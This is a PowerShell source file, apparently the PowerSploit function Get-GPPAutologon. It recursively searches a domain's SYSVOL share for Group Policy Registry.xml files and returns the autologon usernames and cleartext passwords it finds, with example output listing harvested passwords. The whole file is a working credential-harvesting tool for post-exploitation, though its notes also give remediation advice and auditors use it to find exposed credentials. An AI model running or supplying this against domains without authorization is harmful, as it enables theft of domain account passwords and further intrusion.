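  function Get-GPPAutologon
  {
  <#
  .SYNOPSIS

  Retrieves password from Autologon entries that are pushed through Group Policy Registry Preferences.

  PowerSploit Function: Get-GPPAutologon
  Author: Oddvar Moe (@oddvarmoe)
  Based on Get-GPPPassword by Chris Campbell (@obscuresec) - Thanks for your awesome work!
  License: BSD 3-Clause
  Required Dependencies: None
  Optional Dependencies: None

  .DESCRIPTION

  Get-GPPAutologon searches the domain controller for registry.xml to find autologon information and returns the username and password.

  Each Registry.xml that mentions both DefaultPassword and DefaultUserName yields one
  object with the properties UserNames, Passwords and File. Files without both
  entries yield nothing.

  .EXAMPLE

  PS C:\> Get-GPPAutologon

  UserNames File Passwords
  --------- ---- ---------
  {administrator} \\ADATUM.COM\SYSVOL\Adatum.com\Policies\{... {PasswordsAreLam3}
  {NormalUser} \\ADATUM.COM\SYSVOL\Adatum.com\Policies\{... {ThisIsAsupaPassword}


  .EXAMPLE

  PS C:\> Get-GPPAutologon | ForEach-Object {$_.passwords} | Sort-Object -Uniq

  password
  password12
  password123
  password1234
  password1234$
  read123
  Recycling*3ftw!

  .NOTES

  The Value attribute is returned exactly as it is stored in Registry.xml; the
  function performs no decryption. A non-empty result therefore means an autologon
  credential sits in cleartext on SYSVOL, which is readable by authenticated domain
  users by default. Remediation is to remove the DefaultPassword preference item
  from the GPO and change the password of the affected account.

  Folders that cannot be read are skipped silently, so an empty result does not
  prove that no such file exists.

  .LINK

  https://support.microsoft.com/nb-no/kb/324737
  #>

      [CmdletBinding()]
      Param ()

      #Some XML issues between versions
      Set-StrictMode -Version 2

      # Helper: parse one Registry.xml and return its autologon fields.
      # Emits nothing when the file lacks a DefaultPassword or DefaultUserName entry.
      function Get-GPPInnerFields
      {
          [CmdletBinding()]
          Param (
              # Full path of the Registry.xml file to inspect
              $File
          )

          try
          {
              [xml] $Xml = Get-Content ($File)

              #declare empty arrays
              $Password = @()
              $UserName = @()

              # Substring pre-filter on the raw XML before walking its elements
              if (($Xml.innerxml -like "*DefaultPassword*") -and ($Xml.innerxml -like "*DefaultUserName*"))
              {
                  # Logged once per matching file, not once per Properties element
                  Write-Verbose "Potential password in $File"

                  foreach ($prop in $Xml.GetElementsByTagName("Properties"))
                  {
                      switch ($prop.name)
                      {
                          'DefaultPassword'
                          {
                              # The unary comma wraps the element in a one-item array
                              # before it enters the pipeline
                              $Password += , $prop | Select-Object -ExpandProperty Value
                          }

                          'DefaultUsername'
                          {
                              $UserName += , $prop | Select-Object -ExpandProperty Value
                          }
                      }
                  }

                  # Substitute a visible marker for fields that came back empty
                  if (!($Password))
                  {
                      $Password = '[BLANK]'
                  }

                  if (!($UserName))
                  {
                      $UserName = '[BLANK]'
                  }

                  Write-Verbose "The password is between {} and may be more than one value."

                  # One result object per file; Passwords and UserNames may hold
                  # several values and are not paired with each other
                  return New-Object -TypeName PSObject -Property @{
                      'Passwords' = $Password
                      'UserNames' = $UserName
                      'File'      = $File
                  }
              }
          }
          # Report the error that was actually caught for this file
          catch { Write-Error $_ }
      }

      try
      {
          #ensure that machine is domain joined and script is running as a domain account
          if ( ( ((Get-WmiObject Win32_ComputerSystem).partofdomain) -eq $False ) -or ( -not $Env:USERDNSDOMAIN ) )
          {
              throw 'Machine is not a domain member or User is not a member of the domain.'
          }

          #discover potential registry.xml containing autologon passwords
          Write-Verbose 'Searching the DC. This could take a while.'

          # SilentlyContinue: unreadable folders are skipped rather than reported
          $XMLFiles = Get-ChildItem -Path "\\$Env:USERDNSDOMAIN\SYSVOL" -Recurse -ErrorAction SilentlyContinue -Include 'Registry.xml'

          if ( -not $XMLFiles ) {throw 'No preference files found.'}

          Write-Verbose "Found $($XMLFiles | Measure-Object | Select-Object -ExpandProperty Count) files that could contain passwords."

          foreach ($File in $XMLFiles)
          {
              $Result = (Get-GppInnerFields $File.Fullname)
              Write-Output $Result
          }
      }
      catch { Write-Error $_ }
  }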